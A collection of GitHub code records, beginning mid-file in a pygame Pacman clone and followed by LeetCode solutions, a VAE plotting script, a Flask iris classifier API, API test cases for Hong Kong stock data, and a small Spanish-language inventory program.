[(x+1, y), (x, y-1), (x-1, y), (x, y+1)] \n return results\n\nclass Pacman(pygame.sprite.Sprite):\n def __init__(self, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pacman.png')\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position\n self.direction = 0\n self.speed = 0\n self.prevPosition = position\n self.gridLocation = (0, 0)\n self.pooledInput = 4\n self.kU = self.kD = self.kL = self.kR = 0\n \n def update(self):\n x, y = 
self.position\n xVel = yVel = 0\n row, column = self.gridLocation\n \n #block collision\n blockCollisions = pygame.sprite.spritecollide(self, game.blockS, False)\n collided = 0\n for block in blockCollisions:\n if block:\n self.speed = 0\n collided = 1\n\n if self.kU and game.levelCoords[row-1][column] != 1 or self.kL and game.levelCoords[row][column-1] != 1 or self.kD and game.levelCoords[row+1][column] != 1 or self.kR and game.levelCoords[row][column+1] != 1:\n if not collided: self.speed = 1\n \n #input pooling\n if self.kU:\n if game.levelCoords[row-1][column] == 1: self.pooledInput = 0\n else: self.direction = 0\n if self.kL:\n if game.levelCoords[row][column-1] == 1: self.pooledInput = 1\n else: self.direction = 1\n if self.kD:\n if game.levelCoords[row+1][column] == 1: self.pooledInput = 2\n else: self.direction = 2\n if self.kR:\n if game.levelCoords[row][column+1] == 1: self.pooledInput = 3\n else: self.direction = 3\n\n if self.pooledInput == 0 and game.levelCoords[row-1][column] != 1:\n self.direction = 0\n self.pooledInput = 4\n if self.pooledInput == 1 and game.levelCoords[row][column-1] != 1:\n self.direction = 1\n self.pooledInput = 4 \n if self.pooledInput == 2 and game.levelCoords[row+1][column] != 1:\n self.direction = 2\n self.pooledInput = 4\n if self.pooledInput == 3 and game.levelCoords[row][column+1] != 1:\n self.direction = 3\n self.pooledInput = 4\n\n #update position \n if self.direction == 0: yVel = -self.speed\n elif self.direction == 1: xVel = -self.speed\n elif self.direction == 2: yVel = self.speed\n elif self.direction == 3: xVel = self.speed\n \n nextPosition = (x + xVel, y + yVel)\n\n for i in range(0, len(game.levelCoords)):\n for j in range(0, len(game.levelCoords[i])):\n tmpRect = self.image.get_rect()\n tmpRect.center = nextPosition\n if self.rect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n if tmpRect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n\n if collided:\n nextPosition = self.prevPosition\n \n self.prevPosition = self.position\n self.position = nextPosition \n self.rect = self.image.get_rect()\n self.rect.center = self.position \n \n #reset key presses\n self.kU = self.kD = self.kL = self.kR = 0\n \nclass Pellet(pygame.sprite.Sprite):\n\n def __init__(self, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pellet.png')\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position \n\nclass Block(pygame.sprite.Sprite):\n def __init__(self, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('block.png')\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position\n\nclass Ghost(pygame.sprite.Sprite):\n def __init__(self, position, number): \n pygame.sprite.Sprite.__init__(self)\n \n if number == 0: self.image = pygame.image.load('blinky.png')\n elif number == 1: self.image = pygame.image.load('inky.png')\n elif number == 2: self.image = pygame.image.load('pinky.png')\n elif number == 3: self.image = pygame.image.load('clyde.png')\n \n self.safeCorner = (0, 0) \n self.ghostID = number\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position\n self.gridLocation = (0, 0)\n self.direction = 0\n self.hitWall = 0\n self.canMove = 0\n self.prevDirection = 4\n self.scatter = 0\n self.targetTile = (0, 0)\n self.flipped = 0\n self.path = []\n \n def getSafeCorner(self): \n if self.ghostID == 0: self.safeCorner = (0, game.gridLength)\n elif 
self.ghostID == 1: self.safeCorner = (game.gridHeight, game.gridLength)\n elif self.ghostID == 2: self.safeCorner = (0, 0)\n elif self.ghostID == 3: self.safeCorner = (game.gridHeight, 0)\n\n def flipDirection(self):\n if self.direction == 0: self.direction = 2\n elif self.direction == 1: self.direction = 3\n elif self.direction == 2: self.direction = 0\n elif self.direction == 3: self.direction = 1\n\n def findTargetTile(self): \n if not self.scatter:\n self.flipped = 0\n y, x = game.pacman.gridLocation\n if self.ghostID == 0: #Blinky: Target tile is pacmans current tile\n self.targetTile = (y, x)\n \n if self.ghostID == 1: #Inky: Target tile is double the vector between blinky and pacman\n tmpX = 0\n tmpY = 0\n if game.pacman.direction == 0:\n tmpX = x\n tmpY = y - 2\n if game.pacman.direction == 1:\n tmpX = x - 2\n tmpY = y \n if game.pacman.direction == 2:\n tmpX = x\n tmpY = y + 2 \n if game.pacman.direction == 3:\n tmpX = x + 2\n tmpY = y\n blY, blX = game.blinky.gridLocation\n self.targetTile = (blY + ((tmpY - blY) * 2), blX + ((tmpX - blX) * 2))\n \n if self.ghostID == 2: #Pinky: Target tile is 2 ahead of direction pacman is currently travelling\n if game.pacman.direction == 0: self.targetTile = (y - 2, x)\n if game.pacman.direction == 1: self.targetTile = (y, x - 2)\n if game.pacman.direction == 2: self.targetTile = (y + 2, x)\n if game.pacman.direction == 3: self.targetTile = (y, x + 2)\n \n if self.ghostID == 3: #Clyde: If closer than 8 tiles target tile is safe corner, otherwise same as blinky\n clY, clX = self.gridLocation\n distX = x - clX\n distY = y - clY\n if distX >= 8 or distX <= -8 or distY >= 8 or distY <= -8: self.targetTile = (y, x)\n else: self.targetTile = self.safeCorner\n\n def update(self):\n self.hitWall = 0\n if self.targetTile == (0, 0): self.findTargetTile()\n if self.safeCorner == (0, 0): self.getSafeCorner()\n\n atInter = 0\n for i in game.level.intersections:\n if i == self.gridLocation:\n atInter = 1\n \n if self.scatter and not self.flipped:\n self.flipped = 1\n self.flipDirection()\n self.targetTile = self.safeCorner\n\n if not self.scatter:\n self.findTargetTile()\n \n xVel = yVel = 0\n x, y = self.position\n\n if not self.path:\n cameFrom, costSoFar = game.level.aStarSearch(self.gridLocation, self.targetTile)\n self.path = game.level.reconstructPath(cameFrom, self.gridLocation, self.targetTile)\n\n if self.canMove and not self.hitWall or atInter:\n if self.direction == 0: yVel = -1\n elif self.direction == 1: xVel = -1\n elif self.direction == 2: yVel = 1\n elif self.direction == 3: xVel = 1\n\n self.position = (x + xVel, y + yVel)\n\n for i in range(0, len(game.levelCoords)):\n for j in range(0, len(game.levelCoords[i])):\n tmpRect = self.image.get_rect()\n tmpRect.center = (x + xVel, y + yVel)\n if self.rect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n if tmpRect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n\n blockCollisions = pygame.sprite.spritecollide(self, game.blockS, False)\n for block in blockCollisions:\n cameFrom, costSoFar = game.level.aStarSearch(self.gridLocation, self.targetTile)\n self.path = game.level.reconstructPath(cameFrom, self.gridLocation, self.targetTile)\n pX, pY = self.path[0]\n self.position = (25 + (pY*24), 25 + (pX*24))\n self.hitWall = 1\n \n if atInter:\n self.checkDirection()\n \n self.rect = self.image.get_rect()\n self.rect.center = self.position\n\n def checkDirection(self):\n gridX, gridY = self.gridLocation\n if self.path[1]:\n pathX, pathY = self.path[1]\n if pathX - 1 == 
gridX:\n                self.direction = 2  # path nodes are (row, col): row + 1 moves down the screen\n                self.path.pop(0)\n            elif pathX + 1 == gridX:\n                self.direction = 0\n                self.path.pop(0)\n            elif pathY - 1 == gridY:\n                self.direction = 3\n                self.path.pop(0)\n            elif pathY + 1 == gridY:\n                self.direction = 1\n                self.path.pop(0)\n    \n    \nif __name__ == \"__main__\":\n    game = Game()\n    game.mainLoop()\n","repo_name":"Tim-Snow/pacman","sub_path":"Pacman.py","file_name":"Pacman.py","file_ext":"py","file_size_in_byte":22861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
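A minimal, self-contained sketch of the same cameFrom/costSoFar grid A* pattern used by aStarSearch in the Pacman record above, written directly against the standard library's heapq (the record relies on a PriorityQueue wrapper defined elsewhere in its file). The toy maze and the start/end cells below are illustration-only assumptions, not the game's data.

import heapq

def manhattan(a, b):
    (x1, y1), (x2, y2) = a, b
    return abs(x1 - x2) + abs(y1 - y2)

def a_star(grid, start, end):
    frontier = [(0, start)]            # heap of (priority, cell) pairs
    came_from = {start: None}
    cost_so_far = {start: 0}
    while frontier:
        _, current = heapq.heappop(frontier)
        if current == end:
            break
        x, y = current
        for nxt in ((x + 1, y), (x, y - 1), (x - 1, y), (x, y + 1)):
            nx, ny = nxt
            if not (0 <= nx < len(grid) and 0 <= ny < len(grid[0])):
                continue                # out of bounds
            if grid[nx][ny] == 1:
                continue                # wall tiles are never expanded
            new_cost = cost_so_far[current] + 1
            if nxt not in cost_so_far or new_cost < cost_so_far[nxt]:
                cost_so_far[nxt] = new_cost
                heapq.heappush(frontier, (new_cost + manhattan(end, nxt), nxt))
                came_from[nxt] = current
    path, cur = [], end
    while cur is not None:              # walk back from end to start
        path.append(cur)
        cur = came_from[cur]
    return path[::-1]

if __name__ == '__main__':
    demo = [[0, 0, 0, 1],
            [1, 1, 0, 1],
            [0, 0, 0, 0],
            [0, 1, 1, 0]]
    print(a_star(demo, (0, 0), (3, 3)))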
+{"seq_id":"35900825928","text":"# Attemp1: recurssion. TLE if it's not True\n# class Solution:\n# def isHappy(self, n: int) -> bool:\n# if not n or n == 1:\n# return True\n# res = digit = 0\n# while n:\n# digit = n % 10\n# res += digit * digit\n# n = n // 10\n# return True if res == 1 else self.isHappy(res)\n\n# APP1: use set to see if it's been seen\n# Time: O(n) space: O(n) Runtime: 84%\n# class Solution:\n# def isHappy(self, n: int) -> bool:\n# if not n or n == 1:\n# return True\n# seen = set()\n# while n != 1 and n not in seen:\n# seen.add(n)\n# n = self.next_happy(n)\n# return True if n == 1 else False\n\n# def next_happy(self, n):\n# res = digit = 0\n# while n:\n# digit = n % 10\n# res += digit * digit\n# n = n // 10\n# return res\n\n# APP2: two pointers to reduce space to O(1)\n# Time: O(n) space: O(1) Runtime: 61%\nclass Solution:\n def isHappy(self, n: int) -> bool:\n if not n or n == 1:\n return True\n slow, fast = n, n\n while fast != 1:\n slow = self.next_happy(slow)\n fast = self.next_happy(self.next_happy(fast))\n if slow != 1 and slow == fast:\n return False\n return True\n\n def next_happy(self, n):\n res = digit = 0\n while n:\n digit = n % 10\n res += digit * digit\n n = n // 10\n return res","repo_name":"ruifengli-cs/leetcode","sub_path":"Two pointers/202. Happy Number.py","file_name":"202. Happy Number.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7497928222","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom loguru import logger\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor\nfrom tqdm import tqdm\n\nfrom settings import VAESettings, VAEstreamer\n\nlogger.add(\"logs/vae.log\")\nlogger.add(\"/tmp/autoencoder.log\")\n\n\ndef sample_range(encoder, stream, k: int = 10):\n minmax_list = []\n for _ in range(10):\n X, _ = next(stream)\n y = encoder(X).detach().numpy()\n minmax_list.append(y.min())\n minmax_list.append(y.max())\n minmax = np.array(minmax_list)\n return minmax.min(), minmax.max()\n\n\ndef build_latent_grid(decoder, minimum: int, maximum: int, k: int = 20):\n x = np.linspace(minimum, maximum, k)\n y = np.linspace(minimum, maximum, k)\n xx, yy = np.meshgrid(x, y)\n grid = np.c_[xx.ravel(), yy.ravel()]\n\n img = decoder(torch.tensor(grid, dtype=torch.float32))\n return img.detach().numpy()\n\n\ndef plot_grid(\n img: np.ndarray,\n filepath: Path,\n k: int = 3,\n figsize: tuple = (10, 10),\n title: str = \"\",\n) -> None:\n fig, axs = plt.subplots(k, k, figsize=figsize)\n fig.suptitle(title, fontsize=16)\n axs = axs.ravel()\n for i in tqdm(range(k * k)):\n axs[i].imshow(img[i], cmap=\"gray\")\n axs[i].axis(\"off\")\n fig.savefig(filepath)\n logger.success(f\"saved grid to {filepath}\")\n\n\ndef main():\n logger.info(\"Starting show_vae.py\")\n\n presets = VAESettings()\n\n logger.info(\"loading data\")\n test_data = datasets.MNIST(\n root=presets.data_dir,\n train=False,\n download=True,\n transform=ToTensor(),\n )\n teststreamer = VAEstreamer(test_data, batchsize=32).stream()\n\n modelpath = presets.modeldir / presets.modelname\n\n logger.info(f\"loading pretrained model {modelpath}\")\n model = torch.load(modelpath)\n\n X, Y = next(teststreamer)\n\n img = model(X)\n if not presets.imgpath.exists():\n presets.imgpath.mkdir(parents=True)\n\n imgpath = presets.imgpath / Path(\"vae-output-grid.png\")\n plot_grid(img.detach().numpy(), filepath=imgpath)\n\n if presets.latent == 2:\n minimum, maximum = sample_range(model.encoder, teststreamer)\n logger.info(f\"Found range min:{minimum} and max:{maximum}\")\n latent_grid = build_latent_grid(model.decoder, minimum, maximum, k=20)\n latentpath = presets.imgpath / Path(\"latentspace.png\")\n plot_grid(latent_grid, filepath=latentpath, k=20)\n\n else:\n logger.info(\"To visualize the latent space, set VAESettings.latent=2\")\n logger.success(\"Finished show_vae.py\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"raoulg/MADS-MachineLearning-course","sub_path":"notebooks/6_unsupervised/src/show_vae.py","file_name":"show_vae.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"40265296962","text":"import numpy as np\nfrom flask import Flask, abort, jsonify, request\nimport jsonpickle\nimport pickle as pickle\nfrom flask_cors import CORS, cross_origin\n\n# Load the file into my_random_forest\nmy_random_forest = pickle.load(open(\"iris_rfc.pkl\", \"rb\"))\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'SecretKey'\napp.config['CORS_HEADERS'] = 'Content-Type'\n\ncors = CORS(app, resources={r\"/iris\": {\"origins\": \"http://localhost:port\"}})\n\n@app.route('/iris', methods = ['POST'])\n@cross_origin(origin='localhost',headers=['Content-Type','Authorization'])\ndef make_predict():\n # Request the data from the post method and store in data\n data = request.get_json(force = True)\n \n predict_request = [data['sl'], data['sw'], data['pl'], data['pw']]\n\n # Convert the array to an numpy array\n predict_request = np.array(predict_request)\n # Reshape the data to a 2d array\n predict_request = predict_request.reshape(-1,4)\n\n # Change the numpy array with 64bit ints into an array that can be jsonified\n y_hat = my_random_forest.predict(predict_request).tolist()\n output = y_hat\n\n # Jsonify results\n return jsonify(results = output)\n\nif __name__ == '__main__':\n app.run(port = 9000, debug=True)","repo_name":"nataliedrewfs/iris","sub_path":"iris_flask.py","file_name":"iris_flask.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33971197385","text":"import os\nfrom subprocess import check_output\n\ntry:\n VERSION = __import__('pkg_resources') \\\n .get_distribution('sentry').version\nexcept Exception as e:\n VERSION = 'unknown'\n\n\n# print(VERSION)\n\ndef _get_git_revision(path):\n if not os.path.exists(os.path.join(path, '.git')):\n return None\n try:\n revision = check_output(['git', 'rev-parse', 'HEAD'], cwd=path, env=os.environ)\n except Exception:\n return None\n return revision.strip().decode()\n\n\ndef get_revision():\n if 'SENTRY_BUILD' in os.environ:\n return os.environ['SENTRY_BUILD']\n package_dir = os.path.dirname(__file__)\n chekout_dir = os.path.normpath(os.path.join(package_dir, os.pardir, os.curdir))\n path = os.path.join(chekout_dir)\n if os.path.exists(path):\n return _get_git_revision(path)\n return None\n\n\ndef get_version():\n if __build__:\n return '%s.%s' % (__version__, __build__)\n return __version__\n\n\n__version__ = VERSION\n__build__ = get_revision()\n\n\nif __name__ == '__main__':\n print(get_version())\n print(__version__)\n print(__build__)\n","repo_name":"lfany/py","sub_path":"sentry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7043961051","text":"class Solution:\n def getBiggestThree(self, grid: List[List[int]]) -> List[int]:\n rows, cols = len(grid), len(grid[0])\n res = set()\n \n def isValid(pos):\n return 0 <= pos[0] < rows and 0 <= pos[1] < cols\n \n def calculateTotal(lst, size):\n top, left, right, bottom = lst\n x, y = top\n total = grid[top[0]][top[1]] + grid[bottom[0]][bottom[1]] if size > 0 else grid[top[0]][top[1]]\n \n for i in range(1, size + 1):\n l = (x + i, y - i)\n r = (x + i, y + i)\n total += (grid[l[0]][l[1]] + grid[r[0]][r[1]])\n \n if size > 1:\n x, y = bottom\n for i in range(1, size):\n l = (x - i, y + i)\n r = (x - i, y - i)\n total += (grid[l[0]][l[1]] + grid[r[0]][r[1]])\n \n return total\n \n def dfs(x, y, size):\n top = (x, y)\n left = (x + size, y - size)\n right = (x + size, y + size)\n bottom = (x + (size * 2) , y) if size != 0 else top\n \n lst = [top, left, right, bottom]\n \n if all(isValid(pos) for pos in lst):\n total = calculateTotal(lst, size)\n res.add(total)\n dfs(x, y, size + 1)\n \n for i in range(rows):\n for j in range(cols):\n dfs(i, j, 0)\n \n return sorted(list(res))[::-1][:3]","repo_name":"hwennnn/leetcode-solutions","sub_path":"problems/get_biggest_three_rhombus_sums_in_a_grid/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"44087773510","text":"import time,logging,traceback,unittest\r\nfrom HTMLReport import ddt,no_retry\r\nfrom common.parameter import ParameTestCase\r\n\r\nfrom common.tools import postReq\r\nfrom config import domainCMBI\r\nfrom testData.data_F10 import codeDataF10_HK\r\n\r\n# 1、 (不测)/hkf10/announcement 获取港股公告详情\r\n# 2、 /hkf10/announcements 获取港股F10公告列表\r\n# 3、 /hkf10/brief 获取港股简况tab数据\r\n# 4、 (不测)/hkf10/brief/more/dividend 获取更多分红派息\r\n# 5、 (不测)/hkf10/brief/more/holdSharesChange 获取更多持股变动\r\n# 6、 (不测)/hkf10/brief/more/leaderPosition 获取更多公司高管\r\n# 7、 (不测)/hkf10/brief/more/shareholder 获取更多股本股东\r\n# 8、 (不测)/hkf10/detail 股票百科详情信息\r\n# 9、 /hkf10/finance 获取港股财务tab数据\r\n# 10、 (不测)/hkf10/more/finance 获取港股三大表更多\r\n# 11、 (不测)/hkf10/more/mainBusiness 获取港股主营构成更多\r\n# 12、 /hkf10/myAnnouncements 获取自选股公告列表\r\n# 13、 (不测)/hkf10/newsItem 获取港股新闻详情\r\n# 14、 /hkf10/newsList 获取港股新闻列表\r\n# 15、 /hkf10/sellShort 获取港股做空成交比例及更多\r\n\r\n# @unittest.skip('跳过')\r\n@ddt.ddt\r\nclass TestF10_HK(ParameTestCase):\r\n\t@classmethod\r\n\tdef setUpClass(cls):\r\n\t\tlogging.info(' ########## 港股F10 接口测试开始 ########## ')\r\n\r\n\tdef setUp(self):\r\n\t\tpass\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_02_announcements(self,market_Code):\r\n\t\t'''获取港股F10公告列表'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股F10公告列表 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/announcements'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股F10公告列表 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_03_brief(self,market_Code):\r\n\t\t'''获取港股简况tab数据'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股简况tab数据 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/brief'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股简况tab数据 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_09_finance(self,market_Code):\r\n\t\t'''获取港股财务tab数据'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股财务tab数据 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/finance'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股财务tab数据 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_12_myAnnouncements(self,market_Code):\r\n\t\t'''获取自选股公告列表'''\r\n\t\tlogging.info(f' ========== 测试开始 获取自选股公告列表 ========== 
')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/myAnnouncements'\r\n\t\tdataJson={'marketAndCodes':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取自选股公告列表 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_14_newsList(self,market_Code):\r\n\t\t'''获取港股新闻列表'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股新闻列表 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/newsList'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股新闻列表 ========== ')\r\n\r\n\t# @unittest.skip('跳过')\r\n\t@no_retry\r\n\t@ddt.data(*codeDataF10_HK)\r\n\tdef test_15_sellShort(self,market_Code):\r\n\t\t'''获取港股做空成交比例及更多'''\r\n\t\tlogging.info(f' ========== 测试开始 获取港股做空成交比例及更多 ========== ')\r\n\r\n\t\turl=f'{domainCMBI[self.args.env]}/doraemon/hkf10/sellShort'\r\n\t\tdataJson={'marketAndCode':market_Code}\r\n\t\tlogging.info(f'请求数据: {dataJson}')\r\n\r\n\t\t_start=time.perf_counter()\r\n\t\trespJson=postReq(0,dataJson,0,url=url,mod='get')\r\n\t\t_spendTime=f\"{int((time.perf_counter()-_start)*1000)} ms\"\r\n\r\n\t\tlogging.info(f'返回数据: {respJson}')\r\n\t\tlogging.info(f'耗时: {_spendTime}')\r\n\t\tself.assertTrue(respJson['success'])\r\n\t\tlogging.info(f' ========== 测试结束 获取港股做空成交比例及更多 ========== ')\r\n\r\n\tdef tearDown(self):\r\n\t\tpass\r\n\r\n\t@classmethod\r\n\tdef tearDownClass(cls):\r\n\t\tlogging.info(' ########## 港股F10 接口测试结束 ########## ')\r\n\r\nif __name__=='__main__':\r\n\tunittest.main()","repo_name":"JoffreyN/apiAutotest","sub_path":"testCase/testF10_HK.py","file_name":"testF10_HK.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"17659518897","text":"import os\r\nos.system(\"cls\")\r\n\r\nlistaCodigo = []\r\nlistaNombre = []\r\nlistaCategoria = [\"Sobre\",\"Paquete\"]\r\nlistaPrecio = []\r\nlistaCantidad = []\r\n\r\nnomUsuario = input(\"Ingrese Nombre: \")\r\napellUsuario = input(\"Ingrese Apellido: \")\r\n\r\nmenu = \"\"\"------------------------\r\nBienvenido A SuperStore\r\n------------------------\r\n1. Registrar Producto\r\n2. Buscar Producto\r\n3. Lista De Productos\r\n4. Salir\r\n------------------------\r\n\"\"\"\r\n\r\n\r\ndef IngresarF():\r\n while True:\r\n try:\r\n while True:\r\n cod = int(input(\"Codigo del producto: \"))\r\n if len(str(cod)) < 6 or len(str(cod)) > 6:\r\n print(\"Error al ingresar\")\r\n else:\r\n listaCodigo.append(cod)\r\n break\r\n while True:\r\n nom = input(\"Nombre del producto: \")\r\n if len(str(nom)) < 2 or len(str(nom)) > 50:\r\n print(\"Error al ingresar\")\r\n else:\r\n listaNombre.append(nom)\r\n break\r\n while True:\r\n cat = input(\"Categoria del producto: \")\r\n if cat == \"Sobre\" or cat == \"Paquete\" or cat == \"sobre\" or cat == \"paquete\":\r\n listaCategoria.append(cat)\r\n break\r\n else:\r\n print(\"Error al ingresar\")\r\n while True:\r\n pre = int(input(\"Precio Del Producto: $\"))\r\n if pre > 0:\r\n listaPrecio.append(pre)\r\n break\r\n else:\r\n print(\"Error al ingresar\")\r\n while True:\r\n stok = int(input(\"Stock del producto: \"))\r\n if stok >= 0:\r\n listaCantidad.append(stok)\r\n break\r\n elif stok < 0 or float:\r\n print(\"Error al ingresar\") \r\n except:\r\n print(\"Ocurrio una excepcion\")\r\n\r\ndef BuscarF():\r\n codi = input(\"Ingrese codigo a ingresar: \")\r\n print(f\"Listar: {codi}\")\r\n for i in range(len(listaCodigo)):\r\n if codi == listaCodigo:\r\n print(\"----------------------------------------------\")\r\n print(f\"{listaCodigo[i]:6d}{listaNombre[i]:50s}{listaCantidad[i]:30s}{listaPrecio[i]:10s}{listaCantidad[i]:6d}\") \r\n print(\"----------------------------------------------\")\r\n\r\ndef ListarF():\r\n print(\"CODIGO|NOMBRE|CATEGORIA|PRECIO|STOCK\")\r\n cant=0\r\n for i in range(len(listaCodigo)):\r\n if listaCodigo[i] < 5:\r\n stock = \"SI\"\r\n cant += 1\r\n else: \r\n stock = \"NO\"\r\n print(\"----------------------------------------------\")\r\n print(f\"{listaCodigo[i]:6d}{listaNombre[i]:50s}{listaCantidad[i]:30s}{listaPrecio[i]:10s}{listaCantidad[i]:6d}\") \r\n print(\"----------------------------------------------\")\r\n\r\nwhile True:\r\n try:\r\n opc = int(input(menu))\r\n if opc == 4:\r\n print(f\"Gracias por visitarnos {nomUsuario} {apellUsuario}\")\r\n print(\"Version 1.1.0\")\r\n break\r\n elif opc == 1:\r\n IngresarF()\r\n elif opc == 2:\r\n BuscarF()\r\n elif opc == 3:\r\n ListarF()\r\n else:\r\n print(\"Error al ingresar\")\r\n except:\r\n print(\"Ocurrio una excepcion\")\r\n\r\n\r\ninput(\"\\n Enter para terminar\")","repo_name":"Fabiancitto/Certamen_3","sub_path":"Evaluacion 3.py","file_name":"Evaluacion 3.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"45471487989","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x, left =None , right = None):\n self.val = x\n self.left = left\n self.right = right\n\nclass Solution:\n def helper(self, root: TreeNode):\n if not root: return False\n l,r = self.helper(root.left), self.helper(root.right)\n if not l: root.left = None\n if not r: root.right = None\n return any([l,r,(root.val == 1)])\n\n def pruneTree(self, root: TreeNode) -> TreeNode:\n self.helper(root)\n return root\n\nroot = TreeNode(1, TreeNode(1, TreeNode(1, TreeNode(0)), TreeNode(1)), TreeNode(0, TreeNode(0), TreeNode(1)))\ns =Solution()\nans = s.pruneTree(root)\nprint(ans)","repo_name":"NLe1/Competitive-Programming","sub_path":"Leetcode/Leetcode-Binary Tree Pruning.py","file_name":"Leetcode-Binary Tree Pruning.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
